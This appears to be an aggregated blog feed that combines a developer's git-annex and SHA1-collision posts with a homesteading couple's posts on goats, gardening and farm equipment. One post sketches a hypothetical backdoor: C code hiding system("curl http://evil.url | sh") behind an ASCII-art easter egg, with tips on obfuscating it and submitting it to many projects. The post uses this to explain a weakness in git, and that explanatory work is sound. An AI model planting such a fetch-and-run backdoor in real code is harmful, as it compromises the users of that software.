Joey git-annex devblog
day 450 hardening against SHA attacks

Yesterday I said that a git-annex repository using signed commits and SHA2 backend would be secure from SHA1 collision attacks. Then I noticed that there were two ways to embed the necessary collision generation data inside git-annex key names. I've fixed both of them today, and cannot find any other ways to embed collision generation data in between a signed commit and the annexed files.

I also have a design for a way to configure git-annex to expect to see only keys using secure hash backends, which will make it easier to work with repositories that want to use signed commits and SHA2. Planning to implement that tomorrow.

sha1 collision embedding in git-annex keys has the details.

Posted
Anna (Anna and Mark: Waldeneffect)
The utility of a wether
Dwarf Nigerian wether

Meet Edgar, named after Edgar Allen Poe.

Skittish goat

Yes, we decided to keep him. In part, this was just the course of least resistance. By the time I'd stopped crying at the drop of a hat, Aurora had accepted the newcomer into her herd...although she's still chasing him away from any source of food unless I give her something more tasty to keep her occupied.

Floppy-eared goat

But, mostly, Edgar is part of my plan to change several of my goatkeeping methods to prevent another disaster like the one we recently lived through. While many factors were likely at play, I think my biggest management error with Artemesia was thinking I could leave a four-month-old kid with her mother and think the former would be weaned naturally before her high-production mother used up all of her fat and stored nutrients to feed a growing kid.

Now, I mostly fell into that trap because I was too sick to pay attention and didn't realize Aurora was still nursing. But I also didn't really have many other choices at the time. With only two goats in the herd, they had to stay together for the sake of everyone's sanity.

Tiny goat

Adding a wether gives me more options. Assuming we do find another doe to increase our herd to three, a kid or kids could be separated to hang out with Edgar while their mother recuperated from heavy-duty milk production. A boy kid could be kept around longer using the same technique without worrying he'd impregnate his mother or sisters. And I have a feeling that a herd of more than two goats will also be less scared of predators and more able to keep their cortisol levels low.

Yes, you read all that right. We're adding a boy to our herd as a nanny goat. Of course that won't be confusing. Right?

Posted
Joey chatter
2

It's not a known preimage attack..

Posted
Joey
SHA1 collision via ASCII art

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:

7*yLN#!NOKj@{FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=<A!<^}l4~`uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e}Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");
}

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.


My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

Posted
Joey chatter
1

If I had a project that contained binary files, and stored them in git, and that it might be worth $100k for an attacker to backdoor, I would be worried about the new SHA1 collisions.

A good example of such a project is git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git :(

The "random" data that makes the collision is only 128 bytes, and it can be prefixed by any good data you want when the collision is being calculated on your compute cluster. It would be feasible to take a working piece of firmware and disassemble it enough to add an exploit payload, and generate colliding versions that do and don't run the exploit.

Using git-annex and signed commits together is a good way to fix such repositories.

Posted
Joey git-annex devblog
day 449 SHA1 break day

The first SHA1 collision was announced today, produced by an identical-prefix collision attack.

After looking into it all day, it does not appear to impact git's security immediately, except for targeted attacks against specific projects by very wealthy attackers. But we're well past the time when it seemed ok that git uses SHA1. If this gets improved into a chosen-prefix collision attack, git will start to be rather insecure.

Projects that store binary files in git, that might be worth $100k for an attacker to backdoor should be concerned by the SHA1 collisions. A good example of such a project is <git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git>.

Using git-annex (with a suitable backend like SHA256) and signed commits together is a good way to secure such repositories.

Update 12:25 am: However, there are some ways to embed SHA1-colliding data in the names of git-annex keys. That makes git-annex with signed commits be no more secure than git with signed commits. I am working to fix git-annex to not use keys that have such problems.

Posted
Joey chatter
the end times (of git security) are here

"The new result demonstrates a collision in SHA-1. The researchers found two PDF files that have the same hash."

I tried to push the git devs toward having a switch to throw, or a transition plan for this day, but I failed. There has been some slow work being done to that end, so perhaps this will pick up the pace.

You can, however, check the new colliding PDFs into git-annex. Just don't use --backend SHA1 when you do.

Posted
Joey chatter
interesting thought in a Sapir-Whorf kinda way

We don't give names to black holes. I wonder what this says about how we think about them?

Even the black hole in the center of the Milky Way has no name. "Sagittarius A*" is the name of something near it, perhaps its accreation disk, but not the black hole itself.

There's an explanation involving objects needing to be observed to be named, and black holes of course don't emit (much) so can't be seen.

But, we have no difficulty naming exoplanets that have not been directly observed in EM but only deduced by radial velocity measurements of their gravity. For that matter, we've detected gravity waves from colliding black holes now, but the resulting larger black hole didn't get a name either.

What else don't we name (dark matter halos perhaps?), and what does it say about how we think about this stuff?

Posted
Anna (Anna and Mark: Waldeneffect)
No-till preparation in heavily weedy beds
Under the quick hoop

Lettuce isn't quite hardy enough to survive even a mild zone-6 winter despite quick-hoop protection. But the row-cover fabric produces a protected microclimate that pre-heats the soil for spring...while also growing quite a sturdy crop of dead nettle, chickweed, and speedwell.

Early spring weed killing

I've hand-weeded beds like this in the past...and it's a bad idea. One of my goals for this year is to think of smarter ways to handle body-breaking tasks, so I'm experimenting with two early spring weed killers.

Option A: (in the foreground) solarization, which I really don't expect to work at such a cold time of year. Option B: a short-term cardboard kill mulch, which I expect to weaken the plants within a couple of weeks and make them easy to handweed.

Perhaps Mark should pull out the flame weeder and see if we can come up with an experimental option C?

Posted
Anna (Anna and Mark: Waldeneffect)
Barefoot therapy
Dirty feet

When life gets tough...I take off my shoes. The weather gods very kindly sent a Tuesday with high around 70, which meant bare feet and short sleeves were a perfect fit for the garden. After a couple of hours of sun and mud and frog calls, I was feeling astonishingly better.

Posted
Joey
early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh late summer the cliff

Posted
Joey chatter
Egan again

Plus, Minus: A Gentle Introduction to the Physics of Orthogonal has a remarkably simple explanation of the speed of light limit, time dilation, and other effects of relativity. Using nothing more complicated than triangle geometry in a couple of different geometric systems.

As Egan works through some of the implications of a Riemannian universe that has no speed limit, he concludes "Life will need to master some delicate reactions" and "only certain structures will be stable". Of course, he needed to find a somewhat plausible way for life to work in order to write three novels about it (which are quite good reads).

He doesn't explicitly bring up the Anthrophic principle, but if life in a Riemannian universe would be very unlikely and fragile, it's a good thing this isn't one. Being limited by the speed of light seems like a reasonable tradeoff..

Posted
Anna (Anna and Mark: Waldeneffect)
RIP Artemesia
Artemesia
June 2014 - February 20, 2017

We loved you, Artemesia. You were far more than a goat and I feel lucky to have enjoyed even such a short time as part of your herd.

May the honeysuckle be copious and the pastures green on your side of the fence. We'll never forget you.

Posted
Anna (Anna and Mark: Waldeneffect)
Oops?
Goat bridge

So, you know how they tell you not to jump into a new relationship right away after a very important breakup? That's extremely good advice. The trouble is that Aurora started screaming the minute we carried her mother out of the barn. For her sake, we couldn't wait. So we went to check out John and Jeanne's farm in Lee County.

Dwarf nigerians

I'd already cried a couple of gallons at that point, but was doing my best to put on a good face. Still, I have to admit I wasn't 100% as I picked out our new doeling from a herd of twenty contenders.

Wether

How can I be so sure I was off the mark? Well, when we got our new doeling home, she peeed...without squatting...and I realized we'd accidentally purchased a wether. Oops. Now what're we gonna do?

Posted
Anna (Anna and Mark: Waldeneffect)
A friend for Aurora
Baby goats

Despite a niggling sense of deep disloyalty, we decided Saturday that Aurora needs a new friend. So I called up the folks who were disbudding their Dwarf Nigerians at the same time Aurora's little horns were being burnt off.

"Any chance you have a goat for sale?" I asked.

"We've got several," they answered. "Come on over Monday."

Life goes on. Today we're taking a trip to see how those little cuties look all grown up.

Posted
Anna (Anna and Mark: Waldeneffect)
Virtual road trip with goat
Doeling

Holding a sick goat in your arms for a long February day is like experiencing a road trip as a child. You have a vague idea of where you're going and why, but no control over the route or how long it will take to get there.

If you're lucky, your seat mate brought some cud to chew and is willing to submit to the boredom of joint napping. Otherwise, it will be a long series of "No, don't eat my notebook. No, don't jump on your mother. No, just no."

Visiting chickens

The sights alternate between seemingly endless monotony and moments of surprising wonder. Like when the chickens travel far outside their usual stomping grounds and come to call.

You've never brought enough books. Or at least not quite the right books. But it somehow doesn't matter because you end up suspended in an endless now.

And if it's an overnight trip? Well, then you sleep fitfully and wake early, hoping today's road will be straighter, the path less windy, and the destination more clear.

Thank you all for the secondhand hope. It's much appreciated.

Posted
Joey: olduse.net blog
great renaming

Olduse.net is now past the Great Renaming!

While it was being discussed back in September, I only noticed it had happened when I fired up the news reader recently, after a news-fast over the holidays. There were suddenly lots of new groups to subscribe to, with the new hierarchy mixed in with the dead but not quite departed newsgroups.

     174  comp.unix.questions                 
     185  comp.unix.wizards                   
      22  comp.unix.xenix                     
      85  comp.windows.x                      
       0  eunet.bugs.4bsd                     
       0  fluke.micro                         
       0  hp.msdos                            
       0  ky.general                          
       0  ky.news                             
       0  micros                       
       0  misc

After writing some code to delete empty groups, this mixture has now been cleaned up; the old groups are gone.

Post-Renaming, Usenet feels a more focused place. Great for information on a specific technical topic, but otherwise a tad boring in its new focused hierarchies.

The alt groups are coming! I hear they'll arrive sometime this year, and look forward to Usenet getting wild and wooly once more.

The Great Renaming FAQ

Posted
Anna (Anna and Mark: Waldeneffect)
Handfeeding and hope
Daffodil bud

Our month-long goat rollercoaster is on another downswing at the moment. Artemesia was doing much better, with the exception of serious weakness in her hind end, earlier in the week. So the vet prescribed selenium (for the weakness) and recommended trying to take her off the antibiotics.

Within 48 hours, she was back to circling as best she could on her wobbly hind legs. The vet, once again, was out of town, so we put her back on antibiotics, hand feeding, and hope. If you've got some of the latter to spare, please send it our way.

Posted
mark (Anna and Mark: Waldeneffect)
Roadside assistance
Truck being winched up on to a roll back wrecker.

Our old farm truck broke a serpentine belt today.

Lucky for me that it was before I loaded it up with gravel.

It was nice when two people stopped to see if I needed help.

Posted
Joey git-annex devblog
day 448 git push to update remote

Today was all about writing making a remote repo update when changes are pushed to it.

That's a fairly simple page, because I added workarounds for all the complexity of making it work in direct mode repos, adjusted branches, and repos on filesystems not supporting executable git hooks. Basically, the user should be able to set the standard receive.denyCurrentBranch=updateInstead configuration on a remote, and then git push or git annex sync should update that remote's working tree.

There are a couple of unhandled cases; git push to a remote on a filesystem like FAT won't update it, and git annex sync will only update it if it's local, not accessed over ssh. Also, the emulation of git's updateInstead behavior is not perfect for direct mode repos and adjusted branches.

Still, it's good enough that most users should find it meets their needs, I hope. How to set this kind of thing up is a fairly common FAQ, and this makes it much simpler.

(Oh yeah, the first ancient kernel arm build is still running. May finish before tomorrow.)

Today's work was sponsored by Jake Vosloo on Patreon.

Posted
Anna (Anna and Mark: Waldeneffect)
Propagating shiitake mushrooms for free: Full-size logs
Cardboard mycelium barrier

We didn't order any spawn, so how do we plan to get fungi into our new mushroom logs? The idea is to riff off our recent mini-log success and see if we can get mycelium to run from existing logs into fresh new wood.

After bringing three sycamore logs home to our mushroom station, I soaked corrugated cardboard in warm water and layered the wet paper product on top of the fresh logs. Corrugated cardboard is a perfect environment for spawn, so it should tempt the existing fungi out of their old logs and into the new.

Shiitake logs

Speaking of old logs, we stacked three of those on top of the cardboard layer. I was careful to choose all logs of the same variety since I want to get a triple dose of inoculation rather than having different types of shiitakes fighting it out for the fresh wood.

As a side note, I fully expect the three old logs to stop fruiting as soon as they notice the fresh substrate beneath them. In general, fungi are either colonizing new ground as fast as they can or popping out mushrooms to spread their spores, never doing both at the same time. So if you only have a few logs, you might not want to try this at home --- your fruiting logs will be out of commission for as long as they're spreading spawn down below.

Of course, this is all hypothetical at the moment. Time to settle in to wait and see what happens!

Posted
Joey
Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

Posted
Anna (Anna and Mark: Waldeneffect)
Aquaponic fish dieoff
Aquaponic growbed

I'm ashamed to say that my fish started ailing right about the same time as Artemesia and my reaction was, "I can't deal with sick fish right now." Predictably, not dealing meant they all kicked the bucket, then rotted within the tank (I really didn't want to deal with them) and fed the plants for a while that way.

Now that the water's cleared back up, it's time to figure out what I did wrong and get back on track. I suspected the issue was pH since that was the one part of the water chemistry that was still swinging pretty widely before I introduced the fish. Sure enough, upon testing, I found the nitrogen had all been eaten up but the pH was a far-too-sweet 8.0.

Aquaponic celery

It's possible the high pH is just a remnant of the cycling process not quite being complete. In the past, I'd lowered pH with lemon juice, but Aquaponic Gardening suggests citric acid (the acid in lemon juice) is a bad choice since it kills the good bacteria in my grow bed.

This time, I just did a partial water change (15%) using rain-barrel water (pH 6.5), which brought the overall tank water down very slightly. Then I used two tablespoons of vinegar to bring me back to neutral (7.0) pH. Here's hoping the pH stays a bit steadier over the next few days so I'll feel comfortable adding back in fish....

Posted
Joey git-annex devblog
day 447 bug class

When you see a command like "ssh somehost rm -f file", you probably don't think that consumes stdin. After all, the rm -f doesn't. But, ssh can pass stdin over the network even if it's not being consumed, and it turns out git-annex was bitten by this.

That bug made git-annex-checkpresentkey --batch with remote accessed over ssh not see all the batch-mode input that was passed into it, because ssh sometimes consumed some of it.

Shell scripts using git-annex could also be impacted by the bug, for example:

#!/bin/sh
find . -type l -atime 100 | \
    while read file; do
        echo "gonna drop $file that has not been used in a while"
        git annex drop "$file"
    done

Depending on what remotes git annex drop talks to, it might consume parts of the output of find.

I've fixed this in git-annex now (using ssh -n when running commands that are not fed some stdin of their own), but this seems like a class of bug that could impact lots of programs that run ssh.


I've been thinking about ?simpler setup for remote worktree update on push.

One nice way to make a remote update its worktree on push is available in recent-ish gits, receive.denyCurrentBranch=updateInstead. That could already be used with git annex sync, but it hid any error messages when pushing the master branch to the remote (since that push fails with a large error message in default configurations). Found a way to make the error message be displayed when the remote's receive.denyCurrentBranch does not have the default configuration.

The remaining problem is that direct mode and adjusted branch remotes won't get their works trees updated even when configured that way. I am thinking about adding a post-update hook to support those.


Also continuing to bring up the ancient kernel arm autobuilder. It's running its first build now.

Today's work was sponsored by Riku Voipio.

Posted
Anna (Anna and Mark: Waldeneffect)
Hazel: The ultimate early bloomer
Male hazel catkins

The male hazel flowers are opening up, both on wild hazelnuts and on the hybrids in our yard. Finally, a good source of pollen for the honeybees who have been unusually busy during this warm winter weather!

Hybrid hazel budThe bush pictured at the top of this post is an unnamed hybrid from the Arbor Day Foundation. But, in the background, next generation named hybrids look like they might produce female flowers this year.

It's unusual for a plant to commit to female flowers before it makes the energetically cheaper males. But when I dissected one of the plump pink buds on the catkin-less plants I'm pretty sure I found stigmas (female flower parts) buried deep inside. I guess I'll just have to wait and see what these buds turn into. Maybe tasty nuts with thinner shells?

Posted
Joey chatter
american dream

The sole silver lining of our ongoing presidential nightmare is that now you can watch American Honey, and while you do, keep in mind that the POTUS is in essence, a salesman.

Posted
Joey chatter
1996?!

Apparently the mere fact of a file being dated 1996 makes a typical computer user in 2017 think they must be infected by a virus.

This is enough to draw dismal conclusions about almost everything involving computers. I'll spare you my spelling them all out.

Posted
Anna (Anna and Mark: Waldeneffect)
Artemesia's unborn kids
Goats in the winter sun

Artemesia is still getting better, very slowly but hopefully surely. In the meantime, I've had a lot of questions about her hypothetical kids, so I thought I'd give you all the dirt.

According to the vet, if Artemesia lost her kids at this point (halfway through her pregnancy), we'd probably lose her. I assume that means there would be blood and other obvious signs of miscarriage, of which there have been none.

So, presumably she's still feeding miniature goatlings, which is probably why it's so hard for her to bounce back. If she does make it to term and pops out healthy kids, I'm seriously considering bottle feeding them (as little as I like that thought), so we can dry her off immediately and let her finish recuperating in peace.

In the meantime, I'm stuffing my favorite goat with as much honeysuckle as she'll eat and am thrilled that she's finally strong enough to consume hay out of the manger once again. Maybe by this time next week, a walk around the yard won't wear her out?

Posted
Joey git-annex devblog
day 446 quiet progress

Last week I only had energy to work most of each day on git-annex, or to blog about it. I chose quiet work. The changelog did grow a good amount.

Today, fixed some autobuilder problems, and I am gearing up to add another autobuild, targeting arm boxes with older linux kernels, since I got a chance to upgrade the arm autobuilder's disk this weekend.

Also, some work on the S3 special remote, and worked around a bug in sqlite's handling of umask.

Backlog is down to 243 messages.

Today's work was sponsored by Trenton Cronholm on Patreon.

Posted
Anna (Anna and Mark: Waldeneffect)
Homemade medieval helmets

Sword with backgroundAfter a little manipulation with the GIMP, I think I came up with an Aimee author photo that looks like me...but with flare. A huge thank you to Willie Ellis for lending us his homemade helmet to turn a so-so costume into something special.

If you're in the area, you might check out Willie's facebook page to see the furniture he and his brothers create. They don't jut work with wood, they're blacksmiths too. So if you're looking for a medieval helmet...well now you know who can hook you up!

Posted
Joey chatter
early spring

Enjoyed this mid-March early spring day biking down to the river, listening to frogs, spotting the first flowers out, and not bothered by some light spring showers.

Oh, wait, it's not even mid February yet? Hmmm...

Posted
Anna (Anna and Mark: Waldeneffect)
Moistening potting soil
Moistening potting soil

When I was in college, one of my student jobs involved helping out at the school's arboretum. There, I learned all kind of handy planting techniques, such as moistening your potting soil thoroughly in the sink before starting seeds.

Our first spring flat --- onions --- is now on its heating mat and ready to grow. Next up are broccoli and peppers at the first of March.

Posted
Anna (Anna and Mark: Waldeneffect)
Giving Aimee a face
Costumes

Now that I've let the cat out of the bag about my alter-ego, the time seemed ripe to add an author photo to Aimee's various bios. The trouble is...all of my photos look like homesteader-Anna rather than writer-Aimee. What to do?

Wig arrangement

Kayla came through with costumes, makeup, and even an enthusiastic niece to make the day even more fun. Add in Mark and his artistic eye and we soon had more photos than we knew what to do with.

Bio images

Time to narrow them down and give my alterego a face! I hope you'll drop by Aimee's facebook page and vote for your favorite.

Posted
mark (Anna and Mark: Waldeneffect)
Super Winch grinding
Grinding sparks.

One problem we had while hooking up the Super Winch was the hitch extension getting stuck when we slid it into the Kubota receiver.

It took two attempts at grinding off the powder coating on the top and bottom to make it slide easily into the receiver.

Posted
Anna (Anna and Mark: Waldeneffect)
How many goats is too few?
Two goats

I've learned a lot from Artemesia's case of (probably) listeriosis. With 20/20 hindsight, I wouldn't have bred a goat who wasn't in peak health. I would have paid more attention when extra rations weren't enough to get her weight back on. And even though a fecal exam suggests worms aren't implicated after all, I definitely could have dosed our doe with B vitamins and perhaps some with other supplements as well to get her back on track early on.

House goat

But the biggest lesson learned is that two goats really might not be enough goats. Goats are herd animals, and I wonder whether having only her daughter around isn't a low-level stress that cuts into Artemesia's peace of mind.

More troubling is the question of what would have happened if Artemesia really had died. Aurora seemed to be independently content to stand atop her stump in the pasture while her mother circled for hours in the barn. But as soon as I led Artemesia out of the doeling's vicinity to warm her up by the fire, our littlest goat descended into a crying mass of "I'm alone and the world is awful!" Without her mother, we would have been stuck finding an emergency goat friend or giving Aurora away (tough when her mother had died of a possibly infectious illness) ASAP.

Honeysuckle leaves

Something to ponder if Artemesia bounces back and pops out a girl kid or two. In the meantime, though, my attention will remain riveted to the new leaves on the honeysuckle vines, which are providing such excellent goat fodder during Artemesia's rebound.

Posted
mark (Anna and Mark: Waldeneffect)
Super Winch rescue
Winch saves the day.

We got the hitch extension last night which allowed the Super Winch to slide into the hitch receiver like it was meant to do.

It pulled us out without much effort after I secured the cable to a tree.

Such a relief to have the Kubota out of harm's way.

Posted
Anna (Anna and Mark: Waldeneffect)
Recuperating goat
Artemesia

I find it easiest to assess Artemesia's return to health by taking her out and watching her graze. Three days ago, she was so weak that it took a major effort to cut off leaves of wheat, oats, or grass. She ended up gumming most of them instead of eating them and soon gave up.

Now she's able to eat overwintered oats...even though still considerably more slowly than her daughter's gorging approach to grazing. She didn't fall asleep in the middle of dining on gathered honeysuckle either, which is also a good sign.

Grazing goats

Two days ago, Artemesia almost couldn't make it back up the small hill to her pasture after grazing in the yard. Only after I let her nap for a couple minutes at the midpoint did she finish the trek. This time, she still got tired near the end but soldiered on through...planning for an afternoon nap in the dry comfort of her barn.

All told, our poor, sick doe is looking considerably better. You can tell from her coat that she finally has enough energy for a little self-grooming. She's able to eat on her own when I gather garlands of honeysuckle for in-barn consumption. And she's even wiggling away from the needle during her daily shots (which the vet has recommended extending for another week to ease her back into full health). I'll continue to temper my optimism with caution until Artemsia is a dancing picture of goat vitality again, but I'm much relieved to see my beloved doe back on her feet and back in her life again.

Posted

List of feeds:

  • Anna: last checked (25 posts)
  • Anna and Mark: Waldeneffect: last checked (3746 posts)
  • Joey: last checked (143 posts)
  • Joey chatter: last checked (1748 posts)
  • Joey git-annex devblog: last checked (410 posts)
  • Joey: olduse.net blog: last checked (17 posts)
  • Jay: last checked (25 posts)
  • Dani: last checked (21 posts)
  • Errol: last checked (28 posts)
  • Maggie too: last checked (11 posts)a
  • Maggie also: Not Found (64 posts)
  • Maggie: last checked (35 posts)
  • Tomoko: last checked (76 posts)
  • Jerry: last checked (28 posts)